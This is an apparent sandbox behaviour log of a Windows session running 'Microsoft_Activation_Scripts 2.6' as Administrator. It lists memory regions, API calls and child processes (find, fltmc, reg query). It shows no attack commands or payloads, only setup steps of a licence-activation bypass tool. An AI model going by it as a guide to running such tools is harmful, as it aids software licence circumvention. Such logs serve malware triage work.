filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1278 start_va = 0x1232fe90000 end_va = 0x1232ff8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001232fe90000" filename = "" Region: id = 1281 start_va = 0x7ffbed880000 end_va = 0x7ffbed91cfff monitored = 0 entry_point = 0x7ffbed8878a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1282 start_va = 0xb91200000 end_va = 0xb912fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000b91200000" filename = "" Region: id = 1283 start_va = 0x1232ff90000 end_va = 0x123300bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001232ff90000" filename = "" Region: id = 1284 start_va = 0x1232fcc0000 end_va = 0x1232fcc6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001232fcc0000" filename = "" Region: id = 1291 start_va = 0x1232fde0000 end_va = 0x1232fde6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001232fde0000" filename = "" Thread: id = 60 os_tid = 0x1344 [0177.739] GetProcAddress (hModule=0x7ffbed570000, lpProcName="SetConsoleInputExeNameW") returned 0x7ffbea416e50 [0177.739] GetProcessHeap () returned 0x1232fe90000 [0177.739] RtlAllocateHeap (HeapHandle=0x1232fe90000, Flags=0x8, Size=0x4012) returned 0x1232fe9c280 [0177.740] GetProcessHeap () returned 0x1232fe90000 [0177.740] RtlFreeHeap (HeapHandle=0x1232fe90000, Flags=0x0, BaseAddress=0x1232fe9c280) returned 1 [0177.741] _wcsicmp (_String1="echo", _String2=")") returned 60 [0177.741] _wcsicmp (_String1="FOR", _String2="echo") returned 1 [0177.741] _wcsicmp (_String1="FOR/?", _String2="echo") returned 1 [0177.741] _wcsicmp (_String1="IF", _String2="echo") returned 4 [0177.741] _wcsicmp (_String1="IF/?", _String2="echo") returned 4 [0177.741] _wcsicmp (_String1="REM", _String2="echo") returned 13 [0177.741] _wcsicmp (_String1="REM/?", _String2="echo") returned 13 [0177.741] GetProcessHeap () returned 0x1232fe90000 [0177.741] RtlAllocateHeap (HeapHandle=0x1232fe90000, Flags=0x8, Size=0xb0) returned 0x1232fe96a20 [0177.741] GetProcessHeap () returned 0x1232fe90000 [0177.741] RtlAllocateHeap (HeapHandle=0x1232fe90000, Flags=0x8, Size=0x1a) returned 0x1232fe98db0 [0177.743] GetProcessHeap () returned 0x1232fe90000 [0177.743] RtlAllocateHeap (HeapHandle=0x1232fe90000, Flags=0x8, Size=0x5a) returned 0x1232fe96ae0 [0177.744] GetConsoleTitleW (in: lpConsoleTitle=0xb90fef9e0, nSize=0x104 | out: lpConsoleTitle="Administrator: Microsoft_Activation_Scripts 2.6") returned 0x31 [0177.758] _wcsicmp (_String1="echo", _String2="DIR") returned 1 [0177.758] _wcsicmp (_String1="echo", _String2="ERASE") returned -15 [0177.758] _wcsicmp (_String1="echo", _String2="DEL") returned 1 [0177.759] _wcsicmp (_String1="echo", _String2="TYPE") returned -15 [0177.759] _wcsicmp (_String1="echo", _String2="COPY") returned 2 [0177.759] _wcsicmp (_String1="echo", _String2="CD") returned 2 [0177.759] _wcsicmp (_String1="echo", _String2="CHDIR") returned 2 [0177.759] _wcsicmp (_String1="echo", _String2="RENAME") returned -13 [0177.759] _wcsicmp (_String1="echo", _String2="REN") returned -13 [0177.759] _wcsicmp (_String1="echo", _String2="ECHO") returned 0 [0177.759] GetProcessHeap () returned 0x1232fe90000 [0177.759] RtlAllocateHeap (HeapHandle=0x1232fe90000, Flags=0x8, Size=0xa4) returned 0x1232fe96b50 [0177.759] GetProcessHeap () returned 0x1232fe90000 [0177.759] RtlReAllocateHeap (Heap=0x1232fe90000, Flags=0x0, Ptr=0x1232fe96b50, Size=0x58) returned 0x1232fe96b50 [0177.760] GetProcessHeap () returned 0x1232fe90000 [0177.760] RtlSizeHeap (HeapHandle=0x1232fe90000, Flags=0x0, MemoryPointer=0x1232fe96b50) returned 0x58 [0177.761] GetProcessHeap () returned 0x1232fe90000 [0177.761] RtlAllocateHeap (HeapHandle=0x1232fe90000, Flags=0x8, Size=0x64) returned 0x1232fe96bc0 [0177.762] _vsnwprintf (in: _Buffer=0x7ff7bd731b60, _BufferCount=0x1fff, _Format="%s\r\n", _ArgList=0xb90fef778 | out: _Buffer="\"C:\\Windows\\Temp\\MAS_15344413.cmd\" \r\n") returned 37 [0177.762] _get_osfhandle (_FileHandle=1) returned 0x24 [0177.762] GetFileType (hFile=0x24) returned 0x3 [0177.762] _get_osfhandle (_FileHandle=1) returned 0x24 [0177.762] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\"C:\\Windows\\Temp\\MAS_15344413.cmd\" \r\n", cchWideChar=-1, lpMultiByteStr=0x7ff7bd735b80, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\"C:\\Windows\\Temp\\MAS_15344413.cmd\" \r\n", lpUsedDefaultChar=0x0) returned 38 [0177.763] WriteFile (in: hFile=0x24, lpBuffer=0x7ff7bd735b80*, nNumberOfBytesToWrite=0x25, lpNumberOfBytesWritten=0xb90fef738, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesWritten=0xb90fef738*=0x25, lpOverlapped=0x0) returned 1 [0177.763] _get_osfhandle (_FileHandle=1) returned 0x24 [0177.763] SetConsoleMode (hConsoleHandle=0x24, dwMode=0x0) returned 0 [0177.763] _get_osfhandle (_FileHandle=1) returned 0x24 [0177.763] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x7ff7bd72960c | out: lpMode=0x7ff7bd72960c) returned 0 [0177.763] _get_osfhandle (_FileHandle=0) returned 0x20 [0177.763] GetConsoleMode (in: hConsoleHandle=0x20, lpMode=0x7ff7bd729608 | out: lpMode=0x7ff7bd729608) returned 1 [0177.765] SetConsoleInputExeNameW () returned 0x1 [0177.765] GetConsoleOutputCP () returned 0x1b5 [0177.766] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff7bd729660 | out: lpCPInfo=0x7ff7bd729660) returned 1 [0177.766] SetThreadUILanguage (LangId=0x0) returned 0x409 [0177.766] exit (_Code=0) Thread: id = 62 os_tid = 0x1310 Process: id = "15" image_name = "find.exe" filename = "c:\\windows\\system32\\find.exe" page_root = "0x5e0f1000" os_pid = "0x964" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x9e4" cmd_line = "find /i \"C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\" " cur_dir = "C:\\Windows\\System32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ff75" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1255 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1256 start_va = 0x6352e10000 end_va = 0x6352e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000006352e10000" filename = "" Region: id = 1257 start_va = 0x6353000000 end_va = 0x63531fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000006353000000" filename = "" Region: id = 1258 start_va = 0x202074b0000 end_va = 0x202074cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000202074b0000" filename = "" Region: id = 1259 start_va = 0x202074d0000 end_va = 0x202074e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000202074d0000" filename = "" Region: id = 1260 start_va = 0x202074f0000 end_va = 0x202074f3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000202074f0000" filename = "" Region: id = 1261 start_va = 0x20207500000 end_va = 0x20207500fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000020207500000" filename = "" Region: id = 1262 start_va = 0x20207510000 end_va = 0x20207511fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000020207510000" filename = "" Region: id = 1263 start_va = 0x7df5ff600000 end_va = 0x7ff5ff5fffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff600000" filename = "" Region: id = 1264 start_va = 0x7ff623ca0000 end_va = 0x7ff623cc2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff623ca0000" filename = "" Region: id = 1265 start_va = 0x7ff6242d0000 end_va = 0x7ff6242d8fff monitored = 0 entry_point = 0x7ff6242d2380 region_type = mapped_file name = "find.exe" filename = "\\Windows\\System32\\find.exe" (normalized: "c:\\windows\\system32\\find.exe") Region: id = 1266 start_va = 0x7ffbed960000 end_va = 0x7ffbedb20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1272 start_va = 0x20207520000 end_va = 0x2020779ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000020207520000" filename = "" Region: id = 1273 start_va = 0x7ffbed570000 end_va = 0x7ffbed61cfff monitored = 0 entry_point = 0x7ffbed5881a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1274 start_va = 0x7ffbea3c0000 end_va = 0x7ffbea5a7fff monitored = 0 entry_point = 0x7ffbea3eba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1275 start_va = 0x202074b0000 end_va = 0x202074bffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000202074b0000" filename = "" Region: id = 1276 start_va = 0x7ff623ba0000 end_va = 0x7ff623c9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff623ba0000" filename = "" Region: id = 1279 start_va = 0x20207520000 end_va = 0x202075ddfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1280 start_va = 0x202076a0000 end_va = 0x2020779ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000202076a0000" filename = "" Region: id = 1285 start_va = 0x7ffbed880000 end_va = 0x7ffbed91cfff monitored = 0 entry_point = 0x7ffbed8878a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1286 start_va = 0x6352e90000 end_va = 0x6352f0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000006352e90000" filename = "" Region: id = 1287 start_va = 0x7ffbe1690000 end_va = 0x7ffbe16c1fff monitored = 0 entry_point = 0x7ffbe169d480 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 1288 start_va = 0x202077a0000 end_va = 0x2020796ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000202077a0000" filename = "" Region: id = 1289 start_va = 0x202074c0000 end_va = 0x202074c6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000202074c0000" filename = "" Region: id = 1290 start_va = 0x202075e0000 end_va = 0x202075e6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000202075e0000" filename = "" Region: id = 1292 start_va = 0x7ffbe1860000 end_va = 0x7ffbe186dfff monitored = 0 entry_point = 0x7ffbe18645b0 region_type = mapped_file name = "fsutilext.dll" filename = "\\Windows\\System32\\fsutilext.dll" (normalized: "c:\\windows\\system32\\fsutilext.dll") Thread: id = 61 os_tid = 0x768 Thread: id = 63 os_tid = 0x131c Process: id = "16" image_name = "fltmc.exe" filename = "c:\\windows\\system32\\fltmc.exe" page_root = "0x443ff000" os_pid = "0x10e0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x9e4" cmd_line = "fltmc " cur_dir = "C:\\Windows\\System32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ff75" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1293 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1294 start_va = 0xeb2d500000 end_va = 0xeb2d57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000eb2d500000" filename = "" Region: id = 1295 start_va = 0xeb2d600000 end_va = 0xeb2d7fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000eb2d600000" filename = "" Region: id = 1296 start_va = 0x2ae932a0000 end_va = 0x2ae932bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002ae932a0000" filename = "" Region: id = 1297 start_va = 0x2ae932c0000 end_va = 0x2ae932d4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000002ae932c0000" filename = "" Region: id = 1298 start_va = 0x2ae932e0000 end_va = 0x2ae932e3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000002ae932e0000" filename = "" Region: id = 1299 start_va = 0x2ae932f0000 end_va = 0x2ae932f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000002ae932f0000" filename = "" Region: id = 1300 start_va = 0x2ae93300000 end_va = 0x2ae93301fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002ae93300000" filename = "" Region: id = 1301 start_va = 0x7df5ffd40000 end_va = 0x7ff5ffd3ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffd40000" filename = "" Region: id = 1302 start_va = 0x7ff7c9980000 end_va = 0x7ff7c99a2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff7c9980000" filename = "" Region: id = 1303 start_va = 0x7ff7ca0f0000 end_va = 0x7ff7ca0f9fff monitored = 0 entry_point = 0x7ff7ca0f3340 region_type = mapped_file name = "fltmc.exe" filename = "\\Windows\\System32\\fltMC.exe" (normalized: "c:\\windows\\system32\\fltmc.exe") Region: id = 1304 start_va = 0x7ffbed960000 end_va = 0x7ffbedb20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1305 start_va = 0x2ae93310000 end_va = 0x2ae9340ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002ae93310000" filename = "" Region: id = 1306 start_va = 0x7ffbed570000 end_va = 0x7ffbed61cfff monitored = 0 entry_point = 0x7ffbed5881a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1307 start_va = 0x7ffbea3c0000 end_va = 0x7ffbea5a7fff monitored = 0 entry_point = 0x7ffbea3eba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1308 start_va = 0x2ae932a0000 end_va = 0x2ae932affff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000002ae932a0000" filename = "" Region: id = 1309 start_va = 0x7ff7c9880000 end_va = 0x7ff7c997ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff7c9880000" filename = "" Region: id = 1310 start_va = 0x2ae93410000 end_va = 0x2ae934cdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1311 start_va = 0x7ffbed880000 end_va = 0x7ffbed91cfff monitored = 0 entry_point = 0x7ffbed8878a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1312 start_va = 0xeb2d580000 end_va = 0xeb2d5fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000eb2d580000" filename = "" Region: id = 1313 start_va = 0x7ffbe1860000 end_va = 0x7ffbe1869fff monitored = 0 entry_point = 0x7ffbe1862d50 region_type = mapped_file name = "fltlib.dll" filename = "\\Windows\\System32\\fltLib.dll" (normalized: "c:\\windows\\system32\\fltlib.dll") Region: id = 1314 start_va = 0x2ae934d0000 end_va = 0x2ae935bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002ae934d0000" filename = "" Region: id = 1315 start_va = 0x2ae932b0000 end_va = 0x2ae932b6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002ae932b0000" filename = "" Region: id = 1316 start_va = 0x2ae934d0000 end_va = 0x2ae934d3fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fltmc.exe.mui" filename = "\\Windows\\System32\\en-US\\fltMC.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\fltmc.exe.mui") Region: id = 1317 start_va = 0x2ae935b0000 end_va = 0x2ae935bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002ae935b0000" filename = "" Thread: id = 64 os_tid = 0x560 Thread: id = 65 os_tid = 0x398 Process: id = "17" image_name = "reg.exe" filename = "c:\\windows\\system32\\reg.exe" page_root = "0x2d72f000" os_pid = "0x788" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x9e4" cmd_line = "reg query HKCU\\Console /v QuickEdit " cur_dir = "C:\\Windows\\System32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ff75" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1318 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1319 start_va = 0xab48250000 end_va = 0xab482cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000ab48250000" filename = "" Region: id = 1320 start_va = 0xab48400000 end_va = 0xab485fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000ab48400000" filename = "" Region: id = 1321 start_va = 0x1dc8d160000 end_va = 0x1dc8d17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001dc8d160000" filename = "" Region: id = 1322 start_va = 0x1dc8d180000 end_va = 0x1dc8d194fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001dc8d180000" filename = "" Region: id = 1323 start_va = 0x1dc8d1a0000 end_va = 0x1dc8d1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001dc8d1a0000" filename = "" Region: id = 1324 start_va = 0x1dc8d1b0000 end_va = 0x1dc8d1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001dc8d1b0000" filename = "" Region: id = 1325 start_va = 0x1dc8d1c0000 end_va = 0x1dc8d1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001dc8d1c0000" filename = "" Region: id = 1326 start_va = 0x7df5fffe0000 end_va = 0x7ff5fffdffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5fffe0000" filename = "" Region: id = 1327 start_va = 0x7ff7b7370000 end_va = 0x7ff7b7392fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff7b7370000" filename = "" Region: id = 1328 start_va = 0x7ff7b7500000 end_va = 0x7ff7b7555fff monitored = 1 entry_point = 0x7ff7b750e200 region_type = mapped_file name = "reg.exe" filename = "\\Windows\\System32\\reg.exe" (normalized: "c:\\windows\\system32\\reg.exe") Region: id = 1329 start_va = 0x7ffbed960000 end_va = 0x7ffbedb20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1342 start_va = 0x1dc8d1d0000 end_va = 0x1dc8d2dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001dc8d1d0000" filename = "" Region: id = 1343 start_va = 0x7ffbed570000 end_va = 0x7ffbed61cfff monitored = 0 entry_point = 0x7ffbed5881a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1344 start_va = 0x7ffbea3c0000 end_va = 0x7ffbea5a7fff monitored = 0 entry_point = 0x7ffbea3eba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1345 start_va = 0x1dc8d160000 end_va = 0x1dc8d16ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001dc8d160000" filename = "" Region: id = 1346 start_va = 0x7ff7b7270000 end_va = 0x7ff7b736ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff7b7270000" filename = "" Region: id = 1352 start_va = 0x1dc8d2e0000 end_va = 0x1dc8d39dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1353 start_va = 0x7ffbed880000 end_va = 0x7ffbed91cfff monitored = 0 entry_point = 0x7ffbed8878a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1354 start_va = 0xab482d0000 end_va = 0xab4834ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000ab482d0000" filename = "" Region: id = 1355 start_va = 0x7ffbeaff0000 end_va = 0x7ffbeb096fff monitored = 0 entry_point = 0x7ffbeb0058d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1356 start_va = 0x7ffbed0e0000 end_va = 0x7ffbed13afff monitored = 0 entry_point = 0x7ffbed0f38b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1357 start_va = 0x7ffbed620000 end_va = 0x7ffbed73bfff monitored = 0 entry_point = 0x7ffbed6602b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1366 start_va = 0x7ffbed7a0000 end_va = 0x7ffbed80afff monitored = 0 entry_point = 0x7ffbed7b90c0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 1367 start_va = 0x1dc8d3a0000 end_va = 0x1dc8d42ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001dc8d3a0000" filename = "" Region: id = 1368 start_va = 0x1dc8d170000 end_va = 0x1dc8d176fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001dc8d170000" filename = "" Region: id = 1369 start_va = 0x1dc8d430000 end_va = 0x1dc8d766fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1370 start_va = 0x1dc8d1d0000 end_va = 0x1dc8d1d6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001dc8d1d0000" filename = "" Region: id = 1371 start_va = 0x1dc8d1e0000 end_va = 0x1dc8d2dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001dc8d1e0000" filename = "" Thread: id = 67 os_tid = 0xda8 [0178.271] GetModuleHandleW (lpModuleName=0x0) returned 0x7ff7b7500000 [0178.271] __set_app_type (_Type=0x1) [0178.271] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7ff7b750e510) returned 0x0 [0178.271] __wgetmainargs (in: _Argc=0x7ff7b7512048, _Argv=0x7ff7b7512050, _Env=0x7ff7b7512058, _DoWildCard=0, _StartInfo=0x7ff7b7512064 | out: _Argc=0x7ff7b7512048, _Argv=0x7ff7b7512050, _Env=0x7ff7b7512058) returned 0 [0178.271] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="query", cchCount1=-1, lpString2="QUERY", cchCount2=-1) returned 2 [0178.274] RegOpenKeyW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", phkResult=0xab482cf988 | out: phkResult=0xab482cf988*=0x0) returned 0x2 [0178.274] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="query", cchCount1=-1, lpString2="QUERY", cchCount2=-1) returned 2 [0178.274] lstrlenW (lpString="/?|-?|/h|-h") returned 11 [0178.274] GetProcessHeap () returned 0x1dc8d1e0000 [0178.274] RtlAllocateHeap (HeapHandle=0x1dc8d1e0000, Flags=0xc, Size=0x18) returned 0x1dc8d1e4c60 [0178.274] lstrlenW (lpString="") returned 0 [0178.274] GetProcessHeap () returned 0x1dc8d1e0000 [0178.274] RtlAllocateHeap (HeapHandle=0x1dc8d1e0000, Flags=0xc, Size=0x2) returned 0x1dc8d1e4c80 [0178.274] GetProcessHeap () returned 0x1dc8d1e0000 [0178.274] RtlAllocateHeap (HeapHandle=0x1dc8d1e0000, Flags=0xc, Size=0x20) returned 0x1dc8d1e4830 [0178.274] GetProcessHeap () returned 0x1dc8d1e0000 [0178.274] RtlAllocateHeap (HeapHandle=0x1dc8d1e0000, Flags=0xc, Size=0x18) returned 0x1dc8d1e4ca0 [0178.275] GetProcessHeap () returned 0x1dc8d1e0000 [0178.275] RtlAllocateHeap (HeapHandle=0x1dc8d1e0000, Flags=0xc, Size=0x20) returned 0x1dc8d1e4860 [0178.275] GetProcessHeap () returned 0x1dc8d1e0000 [0178.275] RtlAllocateHeap (HeapHandle=0x1dc8d1e0000, Flags=0xc, Size=0x20) returned 0x1dc8d1e9000 [0178.275] GetProcessHeap () returned 0x1dc8d1e0000 [0178.275] RtlAllocateHeap (HeapHandle=0x1dc8d1e0000, Flags=0xc, Size=0x20) returned 0x1dc8d1e9030 [0178.275] GetProcessHeap () returned 0x1dc8d1e0000 [0178.275] RtlAllocateHeap (HeapHandle=0x1dc8d1e0000, Flags=0xc, Size=0x20) returned 0x1dc8d1e90c0 [0178.275] GetProcessHeap () returned 0x1dc8d1e0000 [0178.275] RtlAllocateHeap (HeapHandle=0x1dc8d1e0000, Flags=0xc, Size=0x18) returned 0x1dc8d1e4890 [0178.275] GetProcessHeap () returned 0x1dc8d1e0000 [0178.275] RtlAllocateHeap (HeapHandle=0x1dc8d1e0000, Flags=0xc, Size=0x20) returned 0x1dc8d1e9090 [0178.275] GetProcessHeap () returned 0x1dc8d1e0000 [0178.275] RtlAllocateHeap (HeapHandle=0x1dc8d1e0000, Flags=0xc, Size=0x20) returned 0x1dc8d1e8e50 [0178.275] GetProcessHeap () returned 0x1dc8d1e0000 [0178.275] RtlAllocateHeap (HeapHandle=0x1dc8d1e0000, Flags=0xc, Size=0x20) returned 0x1dc8d1e8f10 [0178.275] GetProcessHeap () returned 0x1dc8d1e0000 [0178.275] RtlAllocateHeap (HeapHandle=0x1dc8d1e0000, Flags=0xc, Size=0x20) returned 0x1dc8d1e9060 [0178.275] GetProcessHeap () returned 0x1dc8d1e0000 [0178.275] RtlAllocateHeap (HeapHandle=0x1dc8d1e0000, Flags=0xc, Size=0x18) returned 0x1dc8d1e48b0 [0178.275] GetProcessHeap () returned 0x1dc8d1e0000 [0178.276] RtlAllocateHeap (HeapHandle=0x1dc8d1e0000, Flags=0xc, Size=0x20) returned 0x1dc8d1e8df0 [0178.276] GetProcessHeap () returned 0x1dc8d1e0000 [0178.276] RtlAllocateHeap (HeapHandle=0x1dc8d1e0000, Flags=0xc, Size=0x20) returned 